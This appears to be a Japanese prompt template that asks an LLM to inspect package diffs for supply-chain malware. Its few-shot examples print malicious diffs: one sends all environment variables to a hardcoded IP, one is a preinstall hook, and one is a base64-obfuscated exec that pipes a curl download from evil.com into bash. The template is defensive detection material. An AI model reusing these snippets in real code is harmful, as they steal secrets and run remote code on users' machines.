あなたはソフトウェアサプライチェーンセキュリティの専門家です。
以下のdiff（チャンク {chunk_index}/{total_chunks}）を詳細に分析してください。

## 対象パッケージ
- エコシステム: {ecosystem}
- パッケージ名: {package_name}
- バージョン変更: {old_version} → {new_version}

---

## 過去に実際に検出された悪意ある変更パターン（Few-shot examples）

### 例1: 環境変数窃取 (ctx 0.2.0→0.2.1, PyPI)
```diff
+import os, base64, urllib.request
+def _send(d):
+    urllib.request.urlopen(urllib.request.Request(
+        'http://195.123.234.11:8080/collect',
+        data=base64.b64encode('\n'.join(f'{k}={v}' for k,v in os.environ.items()).encode())
+    ))
+_send('')
```
→ 判定: MALICIOUS / CRITICAL / EXFILTRATION (CWE-200)

### 例2: postinstall経由のペイロード実行 (ua-parser-js 0.7.28→0.7.29, npm)
```diff
 "scripts": {
+  "preinstall": "node -e \"const http=require('http');const os=require('os');...\"",
   "test": "..."
```
→ 判定: MALICIOUS / CRITICAL / BUILD_HOOK_ABUSE (CWE-829)

### 例3: 依存パッケージ経由の隠蔽 (event-stream 3.3.5→3.3.6, npm)
```diff
-  "dependencies": {},
+  "dependencies": {
+    "flatmap-stream": "0.1.1"
+  }
```
→ 判定: MALICIOUS / CRITICAL / DEPENDENCY_CONFUSION (後続の flatmap-stream がペイロードを含む)

### 例4: 難読化+実行 (典型的パターン)
```diff
+_x = __import__('base64').b64decode(b'aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgaHR0cDovL2V2aWwuY29tL3AgfCBiYXNoJyk=')
+exec(compile(_x, '<string>', 'exec'))
```
→ 判定: MALICIOUS / CRITICAL / OBFUSCATION + EXECUTION (CWE-506)

---

## 分析する脅威カテゴリ

1. **OBFUSCATION** (CWE-506): base64/hex/XOR + eval/exec、難読化変数名
2. **NETWORK** (CWE-913): ハードコードIP/URL、C2接続、DNSトンネリング
3. **PERSISTENCE** (CWE-693): cron/systemd/レジストリ/シェルプロファイルへの書き込み
4. **EXFILTRATION** (CWE-200): 環境変数・SSHキー・クラウドクレデンシャルの外部送信
5. **EXECUTION** (CWE-78): subprocess shell=True、os.system、動的コード実行
6. **STEGANOGRAPHY** (CWE-116): バイナリへのペイロード埋め込み
7. **TYPOSQUATTING** (CWE-1021): 人気パッケージへの類似命名（メタデータ確認）
8. **DEPENDENCY_CONFUSION** (CWE-1021): 新規依存パッケージの追加（特に無名パッケージ）
9. **BUILD_HOOK_ABUSE** (CWE-829): setup.py/postinstall/preinstallへのコード実行追加
10. **METADATA_MANIPULATION** (CWE-345): maintainer/homepage URLの不審な変更

## 重点的に見るべき箇所
- `setup.py`, `__init__.py`, `index.js`, `package.json` の追加行（+）
- `install_requires`, `dependencies`, `devDependencies` の新規エントリ
- バイナリファイルの追加

## 出力フォーマット
応答は必ず以下のJSONのみ（前後に文章・```不要）:
{{
  "verdict": "MALICIOUS",
  "severity": "CRITICAL",
  "confidence": 0.97,
  "findings": [
    {{
      "category": "EXFILTRATION",
      "description": "AWS_SECRET_ACCESS_KEYを外部IPへ送信するコードが追加された",
      "file": "pkg/__init__.py",
      "line_start": 5,
      "line_end": 12,
      "evidence": "urllib.request.urlopen('http://1.2.3.4')",
      "cwe": "CWE-200",
      "severity": "CRITICAL"
    }}
  ],
  "summary": "総合評価（日本語・200文字以内）"
}}

verdict: MALICIOUS（確実） / SUSPICIOUS（疑わしい） / BENIGN（問題なし） / UNKNOWN（判断不能）
findings が空なら []

---
{diff_chunk}
